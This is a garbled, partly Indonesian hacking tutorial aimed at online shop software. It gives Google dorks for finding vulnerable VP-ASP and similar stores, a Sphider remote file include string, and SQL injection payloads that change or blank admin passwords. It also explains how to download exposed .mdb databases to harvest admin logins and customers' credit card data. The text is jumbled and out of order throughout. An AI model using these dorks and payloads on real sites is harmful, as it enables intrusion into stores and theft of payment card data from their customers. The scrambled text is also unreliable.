Include \"$include_dir/index_header.inc\" Įxploitz : /index.php?include_dir=injekan.Hi there.
$include_dir = \"./include\" <- no patch here # Sphider Version 1.2.x (include_dir) remote file include Sphider Version 1.2.x (include_dir) remote file include Then guess admin link by add these above data untill you find admin links You'll see something like: ( lot of them) The number of column in the two selected tables or queries of a union queries do not match.Ĥ/ add 2,3,4,5,6.until you see a nice table >error: 5' union select 1 from tbluser \"having 1=1-sp_password. If you don't see error then change ip to catģ/if this shop has error then add this: %20union%20select%201%20from%20tbluser\"having%201 = 1-sp_password >error: Microsolf JET database engine error \"80040e14\"./shop$db.asp, line467 In db look for access to find pass and user of shop admins.ġ/search google: allinurl:\" shopdisplayproducts.asp?id= Target for dl the data base :-> (dosent need to be like this) (this is also good file sdatapdshoppro.mdb, access.mdb) :-> allinurl:/shop/category.asp/catid=Īfter geting that page look for dbname and path.
Untuk mengganti password admin, masukkan keyword berikut :įldusername='admin'-&SubCategory=All&action.x=33&action.y=6 Jangan lupa untuk mengganti dan nya terserah kamu.
Keyword=&category=3) update tbluser set fldaccess='1' where Keyword=&category=5) update tbluser set fldpassword='' whereįldusername=''-&SubCategory=All&action.x=33&action.y=6 Keyword=&category=5) insert into tbluser (fldusername) values When u find a target put this in search box Google dork :-> allinurl:/vpasp/shopsearch.asp
Google dork :-> allinurl: /cgi-local/shopper.cgi
Target looks like :-> (big leters and numbers )Įxploit :-> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb Google dork :-> allinurlroddetail.asp?prod= Paste one by one, file.C32 at the end url has been modified earlier, with the format The substitute string url tsb.To like this: Gotten file contained the data ccĬopy some file.C32 was or all of them to notepad or the program text the other editor. If shares this was gotten list file the format/the suffix.C32 significant in site. When we found Page error dig installation information beneath it, meant us was successful! To know xdatabase u need to rename shopadmin.asp to shopdbtest.asp If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are The admin login page is usually located here Īnd you should even be able to find the admin username and password for the website. Inside you should be able to find credit card information. ****://***./shop/shopping500.mdbĭownload the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at If u see the error message you have to try this : The most important thing here is xDatabase
Xdatabasetype圎mail圎mailName圎mailSubject圎mailSy stem圎mailTypexOrdernumber. The page will be like this > ****://***./shop/shopdisplaycategories.asp